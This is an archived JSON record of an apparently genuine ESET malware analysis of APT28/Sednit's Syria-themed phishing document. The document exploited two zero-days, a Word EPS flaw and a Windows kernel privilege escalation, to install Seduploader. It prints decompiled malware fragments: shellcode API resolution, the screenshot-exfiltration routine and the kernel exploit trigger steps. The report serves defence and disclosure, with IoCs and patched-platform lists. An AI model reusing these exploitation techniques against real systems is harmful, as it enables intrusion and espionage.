{
	"id": "33e400a2-0336-4975-a3d2-2ab3780e6fcd",
	"created_at": "2026-04-06T00:10:53.85122Z",
	"updated_at": "2026-04-10T03:37:50.629827Z",
	"deleted_at": null,
	"sha1_hash": "6bcc802ba2b58d24cf16ee9afe3ed0a93a41df97",
	"title": "Sednit adds two zero-day exploits using 'Trump's attack on Syria' as a decoy",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 771920,
	"plain_text": "Sednit adds two zero-day exploits using 'Trump's attack on Syria' as a\r\ndecoy\r\nBy ESET Research\r\nArchived: 2026-04-05 19:21:22 UTC\r\nIntroduction\r\nThe Sednit group, also known as APT28, Fancy Bear and Sofacy, is a group of attackers operating since at least 2004 and\r\nwhose main objective is to steal confidential information from specific targets. In October 2016, ESET published an\r\nextensive analysis of Sednit’s arsenal and tactics in a whitepaper titled En Route with Sednit.\r\nLast month, Sednit came into the light again, allegedly interfering with the French elections and more precisely going after the\r\nfrontrunner Emmanuel Macron. In the same time period, a phishing email containing an attachment\r\nnamed Trump's_Attack_on_Syria_English.docx caught our attention.\r\nAnalysis of the document revealed its end goal: dropping Sednit’s well-known reconnaissance tool, Seduploader. To achieve\r\nthis, Sednit used two zero-day exploits: one for a Remote Code Execution vulnerability in Microsoft Word (CVE-2017-0262)\r\nand one for a Local Privilege Escalation in Windows (CVE-2017-0263). 
ESET reported both vulnerabilities to\r\nMicrosoft, who today released patches during the regular Patch Tuesday schedule.\r\nThis blogpost describes the attack itself and the vulnerabilities used to infect its potential targets.\r\nFrom a Word exploit to Seduploader Dropper\r\nThe graphic below shows that this specific attack is totally in line with Sednit’s usual attack methods: the use of a\r\nspearphishing email containing a malicious attachment to install a known first-stage payload.\r\nhttps://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/\r\nPage 1 of 16\n\nThis time, the phishing email was related to Trump’s attack on Syria.\r\nThe infected attachment is a decoy document containing a verbatim copy of an article titled “Trump’s Attack on Syria:\r\nWrong for so Many Reasons” published on April 12, 2017 in The California Courier:\r\nThis is where the attack becomes interesting. The decoy document contains two exploits allowing the installation of\r\nSeduploader. See the schema below for an overview.\r\nThese two exploits can be added to the list of zero-day vulnerabilities used by Sednit over the last 2 years, as shown in this\r\ntimeline:\r\nOnce opened, the decoy document first triggers CVE-2017-0262, a vulnerability in the EPS filter in Microsoft Office. 
In this\r\ncase, the malicious EPS file is called image1.eps within the .docx file:\r\n$ file Trump\\'s_Attack_on_Syria_English.docx\r\nTrump's_Attack_on_Syria_English.docx: Zip archive data, at least v2.0 to extract\r\n$ unzip Trump\\'s_Attack_on_Syria_English.docx\r\nArchive: Trump’s_Attack_on_Syria_English.docx\r\n inflating: [Content_Types].xml\r\n inflating: docProps/app.xml\r\n inflating: docProps/core.xml\r\n inflating: word/document.xml\r\n inflating: word/fontTable.xml\r\n inflating: word/settings.xml\r\n inflating: word/styles.xml\r\n inflating: word/webSettings.xml\r\n inflating: word/media/image1.eps\r\n inflating: word/theme/theme1.xml\r\n inflating: word/_rels/document.xml.rels\r\n inflating: _rels/.rels\r\n$ file word/media/image1.eps\r\nword/media/image1.eps: PostScript document text conforming DSC level 3.0\r\nThe EPS exploit file is obfuscated by a simple XOR. EPS provides the functionality to XOR variables and evaluate source\r\n(exec). The key used here is 0xc45d6491 on a big hex-encoded string and exec is called on the decrypted buffer.\r\n$ cat word/media/image1.eps\r\n%!PS-Adobe-3.0\r\n%%BoundingBox: 36 36 576 756\r\n%%Page: 1 1\r\n/A3{ token pop exch pop } def /A2 def /A4{ /A1 exch def 0 1 A1 length 1 sub { /A5 exch def A1 A5 2 copy get A2 A5 4 mod g\r\nOnce decrypted, the exploit looks very similar to the one which was well documented by FireEye in 2015. The vulnerability\r\nused at the time was CVE-2015-2545. 
The main difference is highlighted in the following block, which is how it performs\r\nthe memory corruption with the forall instruction.\r\n[...]\r\n500 {\r\n A31 589567 string copy pop\r\n} repeat\r\n1 array 226545696 forall\r\n/A19 exch def\r\n[...]\r\nOnce code execution is obtained, it loads a shellcode that retrieves some undocumented Windows APIs such as\r\nNtAllocateVirtualMemory, NtFreeVirtualMemory and ZwProtectVirtualMemory\r\n[...]\r\n v1 = (*(__readfsdword(0x30u) + 12) + 12);\r\n v2 = v1-\u003eInLoadOrderModuleList.Flink;\r\n [...]\r\n for ( addr_user32 = 0; v2 != v1; v135 = v2 )\r\n {\r\n v3 = *(v2 + 48);\r\n v132 = *(v2 + 44);\r\n if ( v3 )\r\n {\r\n v4 = *v3;\r\n v5 = 0;\r\n v6 = 0;\r\n if ( *v3 )\r\n {\r\n do\r\n {\r\n if ( v132 \u0026\u0026 v6 \u003e= v132 )\r\n break;\r\n if ( (v4 - 0x41) \u003c= 0x19u )\r\n v4 += 0x20;\r\n v2 = v135;\r\n v7 = __ROL4__(v5, 7);\r\n ++v3;\r\n v5 = v4 ^ v7;\r\n v4 = *v3;\r\n ++v6;\r\n }\r\n while ( *v3 );\r\n v1 = v133;\r\n }\r\n switch ( v5 )\r\n {\r\n case kernel32:\r\n addr_kernel32 = *(v2 + 24);\r\n break;\r\n case ntdll:\r\n addr_ntdll = *(v2 + 24);\r\n break;\r\n case user32:\r\n addr_user32 = *(v2 + 24);\r\n break;\r\n }\r\n }\r\n[...]\r\nAfter more decryption, the Seduploader Dropper is then loaded and executed. Note that all this execution happens within\r\nthe WINWORD.EXE process running with the current user’s privileges.\r\nSeduploader Dropper\r\nSeduploader is made up of two distinct components: a dropper and a persistent payload (see page 27 of our En Route with\r\nSednit whitepaper).\r\nWhile the dropper used in this attack has evolved since the last version we analyzed, its end goal remains the same: to\r\ndeliver the Seduploader Payload. This new version of the dropper now contains code to integrate the LPE exploit for CVE-2017-0263. 
The detailed analysis of this vulnerability can be found in the next section of the blog; for now, we will focus on\r\nSeduploader.\r\nFirst, the new code in the dropper checks if the process is running on a 32-bit or 64-bit version of Windows. Depending on\r\nthe result, the correct exploit version will be loaded in memory.\r\n[...]\r\n if ( Is64Process() == 1 )\r\n {\r\n addr_exploit = exploit_64b;\r\n size_exploit = 0x2E00;\r\n }\r\n else\r\n {\r\n addr_exploit = exploit_32b;\r\n size_exploit = 0x2400;\r\n }\r\n[...]\r\nOnce the exploit is successfully executed, Seduploader Dropper will reload itself in WINWORD’s memory space and\r\ncall CreateRemoteThread with the address of the UpLoader entry point, which will execute the code in charge of installing\r\nthe Seduploader Payload. This code will run with System privileges, thanks to the exploit.\r\nSeduploader Payload\r\nSeduploader Payload is a downloader used by Sednit’s operators as reconnaissance malware and is composed of two parts.\r\nThe first is responsible for injecting the second part in the proper process, depending on whether it is loaded in\r\nthe WINWORD.EXE process or not. The second part is the downloader itself.\r\nIf Seduploader is running in WINWORD.EXE, its first part will create a mutex named flPGdvyhPykxGvhDOAZnU and\r\nopen a handle to the current process. That handle will be used to allocate memory and write in it the code of the second part\r\nof the Payload component, which will then be executed by a call to CreateRemoteThread. Otherwise, if it is not running in\r\nWINWORD.EXE, Seduploader will use CreateThread to launch its second part.\r\nThe downloader contains the usual Seduploader functions and strings encryption algorithm. 
However, it contains a certain\r\nnumber of changes that we describe below.\r\nFirst, the hashing algorithm used to identify DLL names and API functions to resolve was replaced by a new one. The\r\nattentive readers of our whitepaper will recall that the old hashing algorithm was strongly inspired by code found in\r\nCarberp. Well, the new algorithm was also not created from scratch: this time, Sednit used code very similar to PowerSniff.\r\nNext, a new img tag was added in Seduploader’s report message. This tag allows the exfiltration of screenshots:\r\n[...]\r\nkeybd_event(VK_SNAPSHOT, 0x45u, KEYEVENTF_EXTENDEDKEY, 0u);\r\nSleep(1000u);\r\nkeybd_event(VK_SNAPSHOT, 0x45u, KEYEVENTF_EXTENDEDKEY|KEYEVENTF_KEYUP, 0u);\r\nOpenClipboard(0u);\r\nhData = GetClipboardData(CF_BITMAP);\r\nCloseClipboard();\r\nif ( !hData )\r\n return 0;\r\nGdiplusStartupInput = (const int *)1;\r\nv10 = 0;\r\nv11 = 0;\r\nv12 = 0;\r\nGdiplusStartup(\u0026token, \u0026GdiplusStartupInput, 0);\r\nif ( fGetEncoderClsid((int)L\"image/jpeg\", \u0026imageCLSID) )\r\n{\r\n v4 = sub_10003C5F((int)hData, 0);\r\n ppstm = 0;\r\n CreateStreamOnHGlobal(0u, 1u, \u0026ppstm);\r\n v5 = GdipSaveImageToStream(v4[1], ppstm, \u0026imageCLSID, 0);\r\n if ( v5 )\r\n v4[2] = v5;\r\n (*(void (__thiscall **)(_DWORD *, signed int))*v4)(v4, 1);\r\n IStream_Size(ppstm, \u0026pui);\r\n cb = pui.s.LowPart;\r\n v7 = ppstm;\r\n *a1 = pui.s.LowPart;\r\n IStream_Reset(v7);\r\n v1 = j_HeapAlloc(cb);\r\n IStream_Read(ppstm, v1, cb);\r\n ppstm-\u003elpVtbl-\u003eRelease(ppstm);\r\n}\r\nGdiplusShutdown(token);\r\nreturn v1;\r\n}\r\nAs usual, Sednit operators did not reinvent the wheel. We found some similarities between their implementation of the\r\nscreenshot function and code available on stackoverflow. 
Instead of using GetForegroundWindow to retrieve a handle on the\r\nforeground window in which the user is currently working, Sednit chose to use keybd_event to send a “Print screen”\r\nkeystroke and then retrieve the image from the clipboard.\r\nThe image is then base64-encoded and added to the report, whose structure now looks like this:\r\nTag Value\r\nid= Hard drive serial number*\r\nw= Process list\r\nNone NICs information\r\ndisk= register key**\r\nbuild= 4 bytes\r\ninject optional field***\r\nimg= screenshot encoded in base64\r\n* result of “import win32api;print hex(win32api.GetVolumeInformation(\"C:\\\\\")[1])”\r\n** content of HKLM\\SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum\r\n*** toggled if SEDUPLOADER uses injection into a browser to connect to Internet\r\nScreenshotting was used before by Sednit. In the past, the feature was built in a separate, standalone tool often invoked by\r\nXtunnel at a later infection stage (see page 77 of our whitepaper), but it is now built in Seduploader for use at the\r\nreconnaissance phase.\r\nFinally, on the config side, two new functions were added: shell and LoadLib. The shell config allows the attacker to execute\r\narbitrary code directly in-memory. The LoadLib is a bit field that allows running an arbitrary DLL by calling rundll32.exe.\r\nCVE-2017-0263 - Local privilege escalation\r\nExploit Workflow\r\nAs mentioned before, in order to deploy Seduploader Payload, Seduploader Dropper gains System privileges by exploiting\r\nCVE-2017-0263, an LPE vulnerability. 
In this section, we will describe how this vulnerability is exploited by Sednit.\r\nFirst, even though the vulnerability affects Windows 7 and above (see at the end of this post for the full list of affected\r\nplatforms), the exploit is designed to avoid running on Windows version 8.1 and above.\r\nSince the exploit can target both 32-bit and 64-bit platforms, it will first determine if the process is running under WOW64.\r\nThe exploit will allocate multiple pages, until it reaches a high address (0x02010000). It will then build the following\r\nstructure:\r\nstruct Payload\r\n {\r\n LONG PTEAddress; // Points to the PTE entry containing the physical address of the page containing our st\r\n LONG pid; // Injected process pid;\r\n LONG offset_of_lpszMenuName; // Offset of the lpszMenuName in the win32k!tagCLS structure\r\n LONG offset_of_tagTHREADINFO; // Offset of the pti field in the win32k!tagWND structure.\r\n LONG offset_of_tagPROCESSINFO; // Offset of the ppi field in the win32k!tagTHREADINFO structure.\r\n LONG offset_of_TOKEN; // Offset of the Token field in the nt!_EPROCESS structure.\r\n LONG tagCLS[0x100]; // Array containing the tagCLS of the created windows.\r\n LONG WndProcCode; // Code of the WndProc meant to be run in kernel mode.\r\n };\r\nThen, it will retrieve the address of HMValidateHandle. This function allows the attacker to leak the kernel address of a\r\ntagWND object.\r\nHere is an overview of how the rest of the exploit works:\r\nThe exploit will create 256 random window classes and their associated windows. Each window will have 512 bytes of extra\r\nmemory. This extra memory is contiguous to the tagWND object in the kernel space. After the first created window, i.e. 
in\r\nthe extra memory, the exploit will build a fake object containing mostly only its own address for later use, as shown in the\r\npicture:\r\nWhen all the windows are created, the exploit will allocate 2 additional windows. The purpose of the first one is to be executed\r\nin a kernel thread: let’s call this window KernelWnd, and the other one will mainly receive all the necessary messages\r\nneeded for the exploit to complete; let’s call this window TargetWindow. Then, the exploit associates this procedure with the\r\nnewly allocated object, KernelWnd.\r\n// ...\r\nTargetWindow = CreateWindowExW(0x80088u, MainWindowClass, 0, WS_VISIBLE, 0, 0, 1, 1, 0, 0, hModuleSelf, 0);\r\nKernelWnd = CreateWindowExW(0, MainWindowClass, 0, 0, 0, 0, 1, 1, 0, 0, hModuleSelf, 0);\r\n// ...\r\nSetWindowLongW(KernelWnd, GWL_WNDPROC, (LONG)Payload_0-\u003eWndProc);\r\nLet’s add some context around the behavior of the win32k component. Every time you create a new window through\r\nCreateWindowExW, the driver will allocate a new tagWND object in the kernel. The object can be described like this (some\r\nfields are removed for clarity’s sake):\r\nkd\u003e dt tagWND\r\n win32k!tagWND\r\n +0x000 head : _THRDESKHEAD\r\n +0x028 state : Uint4B\r\n // ...\r\n +0x028 bServerSideWindowProc : Pos 18, 1 Bit\r\n // ...\r\n +0x042 fnid : Uint2B\r\n +0x048 spwndNext : Ptr64 tagWND\r\n +0x050 spwndPrev : Ptr64 tagWND\r\n +0x058 spwndParent : Ptr64 tagWND\r\n +0x060 spwndChild : Ptr64 tagWND\r\n +0x068 spwndOwner : Ptr64 tagWND\r\n +0x070 rcWindow : tagRECT\r\n +0x080 rcClient : tagRECT\r\n +0x090 lpfnWndProc : Ptr64 int64\r\n +0x098 pcls : Ptr64 tagCLS\r\n // ...\r\nAs you can see, the tagWND-\u003elpfnWindowProc contains the address of the procedure associated with this window. 
The\r\ndriver usually lowers its privileges in order to execute this procedure in the user’s context. This behavior is controlled by the\r\nbit tagWND-\u003ebServerSideProc. If this bit is set, then the procedure will be run with elevated privileges, i.e. in the kernel.\r\nThe exploit works by flipping the tagWND-\u003ebServerSideProc bit. All the attacker needs to do is to find a way of flipping\r\nthat bit.\r\nDuring the destruction of the menus, the hook set up before will check if the class of the object is SysShadow as shown on\r\nthe next code block. If that's the case, it will replace the associated procedure with its own.\r\n GetClassNameW(tagCWPSTRUCT-\u003ehwnd, \u0026ClassName, 20);\r\n if ( !wcscmp(\u0026ClassName, STR_SysShadow) )\r\n {\r\n if ( ++MenuIndex == 3 )\r\n {\r\n // tagWND\r\n ::wParam = *(_DWORD *)(FN_LeakHandle((int)hWnd[0]) + sizeof_tagWND_0);\r\n // Replace the WndProc of the object\r\n SetWindowLongW(tagCWPSTRUCT-\u003ehwnd, GWL_WNDPROC, (LONG)FN_TriggerExploit);\r\n }\r\nIn this procedure, we can see that the exploit looks for the WM_NCDESTROY message. If the requirements are met, it will\r\nbuild a malicious tagPOPUPMENU object which is described by the following pseudocode:\r\nif ( Msg == WM_NCDESTROY )\r\n {\r\n struct tagPOPUPMENU *pm = BuildFakeObject();\r\n SetClassLongW(..., pm);\r\n }\r\nNote that the address used to build this object is within the extra memory allocated at the end of our first tagWND. Then, the\r\nexploit calls NtUserMNDragLeave, in order to flip the bServerSideProc bit of our KernelWnd object. To do so, the function\r\nwill retrieve a tagMENUSTATE object using the structure tagTHREADINFO. 
The tagMENUSTATE object contains the\r\naddress of the menu object being destroyed (tagMENUSTATE-\u003epGlobalPopupMenu).\r\nAs you can see, the tagPOPUPMENU is the malicious object we crafted in user space before calling NtUserMNDragLeave.\r\nLooking at the fields in the malicious tagPOPUPMENU, we can see that they all point into the extra memory except one,\r\nwhich points into our KernelWnd object.\r\nFrom here, the execution will reach the function MNFreePopup, which takes a pointer to a tagPOPUPMENU object.\r\nEventually this function will call HMAssignmentUnlock, passing the fields spwndNextPopup and spwndPrevPopup as\r\nargument:\r\n; win32k!HMAssignmentUnlock\r\nrsp,28h\r\nmov rdx,qword ptr [rcx]\r\nand qword ptr [rcx],0\r\ntest rdx,rdx\r\nje win32k!HMAssignmentUnlock+0x4f (fffff960`00119adf)\r\nadd dword ptr [rdx+8],0FFFFFFFFh; Flipping bServerSideProc\r\njne win32k!HMAssignmentUnlock+0x4f (fffff960`00119adf)\r\nmovzx eax,word ptr [rdx]\r\nAfter the execution of the syscall, our tagWND structure associated with our KernelWnd looks like this:\r\nEverything is set! 
The exploit just needs to send the right message in order to trigger the execution of our procedure in\r\nkernel mode.\r\nsyscall(NtUserMNDragLeave, 0, 0);\r\n // Send a message to the procedure in order to trigger its execution in kernel mode.\r\n KernelCallbackResult = SendMessageW(KernelWnd, 0x9F9Fu, ::wParam, 0);\r\n Status.Triggered = KernelCallbackResult == 0x9F9F;\r\n if ( KernelCallbackResult != 0x9F9F )\r\n // Error, try again.\r\n PostMessageW(TargetWindow, 0xABCDu, 0, 0);\r\nFinally, the window procedure running with elevated privileges will steal the SYSTEM token and add it to the calling\r\nprocess. After successfully running the exploit, FLTLDR.EXE should run with SYSTEM privileges, and will install\r\nSeduploader’s payload.\r\nSummary\r\nThis campaign shows us that Sednit has not ceased its activities. They still keep their old habits: using known attack\r\nmethods, reusing code from other malware or public websites, and making small mistakes such as typos in Seduploader’s\r\nconfiguration (shel instead of shell).\r\nAlso usual is the fact that they once again improved their toolset, this time adding some built-in features such as the\r\nscreenshotter and integrating two new zero-day exploits into their arsenal.\r\nPlatforms affected by CVE-2017-0262 and CVE-2017-0263 (according to Microsoft)\r\nCVE-2017-0262\r\nMicrosoft Office 2010 Service Pack 2 (32-bit editions)\r\nMicrosoft Office 2010 Service Pack 2 (64-bit editions)\r\nMicrosoft Office 2013 Service Pack 1 (32-bit editions)\r\nMicrosoft Office 2013 Service Pack 1 (64-bit editions)\r\nMicrosoft Office 2013 RT Service Pack 1\r\nMicrosoft Office 2016 (32-bit edition)\r\nMicrosoft Office 2016 (64-bit edition)\r\nMicrosoft advises all customers to follow the guidance in security advisory ADV170005 as a defense-in-depth measure\r\nagainst EPS filter 
vulnerabilities.\r\nCVE-2017-0263\r\nWindows 7 for 32-bit Systems Service Pack 1\r\nWindows 7 for x64-based Systems Service Pack 1\r\nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\r\nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1\r\nWindows Server 2008 R2 for x64-based Systems Service Pack 1\r\nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)\r\nWindows Server 2012\r\nWindows Server 2012 (Server Core installation)\r\nWindows 8.1 for 32-bit systems\r\nWindows 8.1 for x64-based systems\r\nWindows Server 2012 R2\r\nWindows RT 8.1\r\nWindows Server 2012 R2 (Server Core installation)\r\nWindows 10 for 32-bit Systems\r\nWindows 10 for x64-based Systems\r\nWindows 10 Version 1511 for x64-based Systems\r\nWindows 10 Version 1511 for 32-bit Systems\r\nWindows Server 2016\r\nWindows 10 Version 1607 for 32-bit Systems\r\nWindows 10 Version 1607 for x64-based Systems\r\nWindows Server 2016 (Server Core installation)\r\nWindows 10 Version 1703 for 32-bit Systems\r\nWindows 10 Version 1703 for x64-based Systems\r\nWindows Server 2008 for Itanium-Based Systems Service Pack 2\r\nWindows Server 2008 for 32-bit Systems Service Pack 2\r\nWindows Server 2008 for x64-based Systems Service Pack 2\r\nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)\r\nIoCs\r\nAlso available on ESET's Github.\r\nSHA-1 Filename ESET detection name\r\nd5235d136cfcadbef431eea7253d80bde414db9d Trump's_Attack_on_Syria_English.docx Win32/Exploit.Agent.NWZ\r\n18b7dd3917231d7bae93c11f915e9702aa5d1bbb image1.eps Win32/Exploit.Agent.NWZ\r\n6a90e0b5ec9970a9f443a7d52eee4c16f17fcc70 joiner.dll Win32/Exploit.Agent.NWV\r\ne338d49c270baf64363879e5eecb8fa6bdde8ad9 apisecconnect.dll Win32/Sednit.BG\r\nMutex\r\nflPGdvyhPykxGvhDOAZnU\r\nRegistry 
key\r\nHKCU\\Software\\Microsoft\\Office test\\Special\\Perf\r\nSource: https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/"
	],
	"report_names": [
		"sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy"
	],
	"threat_actors": [
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434253,
	"ts_updated_at": 1775792270,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6bcc802ba2b58d24cf16ee9afe3ed0a93a41df97.pdf",
		"text": "https://archive.orkl.eu/6bcc802ba2b58d24cf16ee9afe3ed0a93a41df97.txt",
		"img": "https://archive.orkl.eu/6bcc802ba2b58d24cf16ee9afe3ed0a93a41df97.jpg"
	}
}